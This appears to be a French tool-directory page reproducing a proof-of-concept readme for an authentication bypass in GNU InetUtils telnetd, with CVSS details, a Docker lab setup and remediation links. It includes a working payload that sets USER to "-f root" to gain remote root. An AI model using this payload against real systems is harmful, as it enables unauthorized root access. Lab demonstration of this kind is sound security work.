Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Vulnérabilité dans GNU InetUtils telnetd permettant un accès root à distance | Kitploit
Outils/GitHubGitHub/lucaspdiniz/cve-2026-24061
Analyse des VulnérabilitésExploitationTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

Vulnérabilité dans GNU InetUtils telnetd permettant un accès root à distance

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Contournement d'authentification dans GNU InetUtils telnetd via injection d'arguments - CVE-2026-24061 📚

Introduction

Une vulnérabilité d'injection d'arguments récemment identifiée dans telnetd de GNU InetUtils permet à des attaquants de contourner l'authentification en définissant la variable d'environnement USER sur la valeur « -f root ». Par conséquent, un attaquant distant non authentifié peut obtenir un accès aux systèmes exécutant le service telnetd vulnérable et élever ses privilèges à root. Si elle est exploitée avec succès, cette faille peut permettre aux attaquants d'accéder à des informations sensibles, de modifier les paramètres système et d'exécuter des commandes arbitraires, ce qui peut entraîner un compromis complet du système.

Détail CVSSCNA (MITRE)
Score de base9.8
VecteurCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vecteur d'attaqueRéseau
Complexité d'attaqueFaible
Privilèges requisAucun
Interaction utilisateurAucune
PortéeInchangée
Impact confidentialitéÉlevé
Impact intégritéÉlevé
Impact disponibilitéÉlevé
Version CVSSv33.1

Que s'est-il passé ?

Nous avons pu accéder au Commit ci-dessous datant de 2015 qui montre le changement de code (ligne 62) ayant créé cette vulnérabilité.

Le but de ce readme est uniquement de montrer l'exécution de l'exploit, pas chaque étape qui a généré ce CVE. Cependant, l'intention est de substituer l'espace réservé %U avec la valeur prise depuis la variable d'environnement USER. Cette variable d'environnement particulière est contrôlée par l'utilisateur et peut être manipulée via le protocole Telnet 🔥 .

Environnement 🔓

Pour ce test, j'ai créé 2 conteneurs en utilisant des images de Docker Hub, avec une version vulnérable d'InetUtils.

  • Conteneur -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

Payload 💀

Avec le payload ci-dessous, nous remplaçons la variable USER et contournons le système d'authentification.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

Versions affectées ✅

  • Telnetd dans GNU InetUtils jusqu'à la version 2.7 permet une authentification à distance.
  • Suivez la mise à jour vers la version Ubuntu. -> https://ubuntu.com/security/CVE-2026-24061

Vérifiez votre version d'inetutils

root@kitploit:~
hostname --version
telnetd --version


À la prochaine :wink:

Télécharger l’outil